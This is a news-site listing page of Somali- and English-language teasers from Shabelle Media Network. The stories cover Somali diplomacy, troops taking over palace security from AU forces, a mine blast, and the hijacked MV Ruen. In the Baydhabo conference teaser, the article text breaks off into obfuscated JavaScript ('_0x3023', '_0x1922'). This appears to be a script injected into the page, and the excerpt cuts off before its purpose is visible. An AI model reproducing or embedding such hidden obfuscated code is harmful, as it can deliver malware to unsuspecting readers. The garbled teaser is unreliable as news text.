Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Sawirro: Safiirka cusub ee Soomaaliya ee Kenya oo kulamo ka bilaabay Nairobi

NAIROBI (SMN) - Safiirka Jamhuuriyadda Federaalka Soomaaliya ee dalka kenya Danjire Jabril Ibraahim Cabdulle ayaa ugu horreyn la kulmay safiirka dowladda Kuwait ee Kenya ahna Madaxa safiirrada Carabta ee  Kenya.   Labada danjire ayaa ka wada hadlay xoojinta xiriirka diblomaasiyadeed ee labada dal, iyagoo isla soo qaaday in laga wada shaqeeyo iskaashiga dhinacyada ganacsiga, maalgashiga, dhoofinta xoolaha maadaama uu dalkeenamu hodan...

Guddoomiyaha SoDMA oo abaal-marin lagu guddoonsiiyay Muqdisho + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Soomaaliyed ee SoDMA Mudane Maxamuud Macallim Cabdulle ayaa xalay ka qaybgalay munaasabad ballaaran oo lagu soo bandhigayey waxqabadka Wasaaradda Arrimaha Gudaha XFS, waxaana goobjoog ka ahaa xafladaan Wasiirka Arrimaha Gudaha XFS Axmed Macallim Fiqi.   Madashaan waxaa lagu soo bandhigay waxii u qabsoomay sanadkaan 2023 Wasaaradda, iyadoo shacabkii ka soo qaybgalay kulankaan wasiirka...

Somali troops take full charge of presidential and parliament security

MOGADISHU, Somalia - AU forces resumed Phase Two of the troop drawdown, officially handing over the State House and Parliament House Forward Operating Bases (FOBs) in Mogadishu to the Somali Security Forces (SSF).   The handover ceremony, attended by ATMIS Head and UN envoy Catriona Laing, UNSOS OiC Qurat-ul-Ain Sodazai, and senior FGS officials led by the National Security Advisor Hussein Moalim, signifies...

Sawirro: Ciidamada Xoogga dalka oo la wareegay amniga Madaxtooyada

MUQDISHO (SMN) - Ciidamada Xoogga Dalka Soomaaliyeed ayaa maanta si rasmi ah ula wareegay amniga guud ee Madaxtooyada, kaddib 16 sano oo walaalaha Ciidamada Afrika ee AMISOM ay door ku lahaayeen sugidda amniga Madaxtooyada iyo Baarlamaanka Federaalka Soomaaliya.   Munaasabad ku qabsoomtay Villa Soomaaliya oo ay ka qeyb-galeen Taliyaha Ciidanka Xoogga Dalka Sarreeye Guuto Ibraahim Sheekh Muxiyadiin, Agaasimaha Guud ee Madaxtooyada...

R/W Ku-xigeenka oo ka qeyb galay shir looga hadlayay ka hor-taga saboolnimada

MUQDISHO (SMN) - Ra’iisul Wasaare Ku-xigeenka Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Saalax Axmed Jaamac, ayaa ka qeyb galay shir lagusoo bandhigayay qorshaha wada-xaajoodka iyo ka hor-taga saboolnimada qaybaheeda kala duwan.   Shirka ayaa looga hadlay hannaankii looga loo yarayn lahaa saboolnimada iyo faqriga, iyadoo lagu jaangoynayo qorshaha Xukuumadda #DanQaran ee yaraynta saboolnimada iyo faqriga. Ra’iisul Wasaare Ku Xigeenka oo hadal dhinacyo badan...

Faah-faahino kasoo baxaya qarax lagu dhaawacay guddoomiye ku xigeen degmo

RUUN-NIRGOOD (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax miino oo maanta ka dhacay duleedka degmada Ruun-nirgood ee gobolka Shabeelaha Dhexe.   Qaraxa oo ahaa miino ayaa ka dhacay inta u dhexeysa degmada Ruun-nirgood iyo deegaanka Hilowle Gaab, halkaas oo ay ka socdaan howlgallo ka dhan ah Al-Shabaab. Wararka ayaa sheegaya in miinada lala eegtay kolonyo uu la...

Somali army’s land force chief calls on militants to surrender amid all-out war

MOGADISHU, Somalia - The Commander of the Somali Land Forces, General Dayah Abdi Abdulle, who is on the front line of the war against Al-Shabaab in the Mudug region said the government is still giving the militants a chance to surrender and give up the violence.   As war enters the second phase, General Abdulle called on Al-Shabaab fighters to leave...

Ciidamada badda Hindiya oo hareereeyay Markab lagu afduubey xeebaha Somalia

MUQDISHO (SMN) - Ciidamada badda Hindiya ayaa hareeyay markab xamuul ah oo sitay calanka Malta kaas oo ay afduubeen dabley aan la garanayn - oo loo badinayo inay yihiin burcad-badeed Soomaali ah - gudaha badda Carabta.   Markabka MV Ruen, oo ay la socdaan 18 shaqaale ah, ayaa farriin u diray barta ganacsiga badaha ee Boqortooyada Ingiriiska Khamiistii, taasoo muujinaysa in lix qof...

Sawirro: Muxuu yahay ujeedka shirka uu Laftagareen ka furay Baydhabo

BAYDHABO (SMN) - Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed (Laftagareen) ayaa Magaalada Baydhabo ku Daah-Furey Shirka Qorshaha Hormarinta Kaabiyaasha Dhaqaalaha Dalka.   Shirka waxaa ka qeybgalay Wasiirada Wasaaraddaha Howlaha guud Dowladdaha Xubanaha ka ah Dowladda Federaal iyo Wasiiru-Dowlaha Wasaarada Howlaha Guud XFS iyo Marti Sharaf Kale. Halkan hoose ka daawo Sawirrada:- function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const...

Indian Navy shadowing a Malta-flagged bulk carrier boarded by Somali pirates

MALTA - The Indian Navy is shadowing a Malta-flagged bulk carrier that was boarded by unknown attackers — likely Somali pirates — in the Arabian Sea.   The MV Ruen, with a crew of 18, had sent a Mayday message on the United Kingdom Maritime Trade Operations portal on Thursday indicating that six unknown people had boarded the vessel. The Indian Navy...

WARAR KALE

Ururka Difaacayaasha Xuquuqda Aadanaha Soomaaliyeed ee loosoo gaabiyo (CSHRD)

Muqdisho, Soomaaliya – Ururka Difaacayaasha Xuquuqda Aadanaha Soomaaliyeed (CSHRD), ayaa ka qeyb galay munaasabad ay Xarunta Hormarinta Qoyska Guryasamo ku qabatay magaalada Muqdisho, taas...

Soomaaliya oo ku biirtay 15 heshiis oo caalami ah, kuna dhaqaaqday casriyeyn taariikhi ah...

Muqdisho, Soomaaliya – Wasaaradda Dekedaha iyo Gaadiidka Badda ee Jamhuuriyadda Federaalka Soomaaliya ayaa maanta ku dhawaaqday in Soomaaliya ay si rasmi ah ugu biirtay...

Somalia Accedes to Fifteen International Maritime Conventions and Legal Instruments in a Historic Modernization...

Mogadishu, Somalia – The Ministry of Ports and Marine Transport today announced the decision of the Federal Republic of Somalia to accede to Fifteen...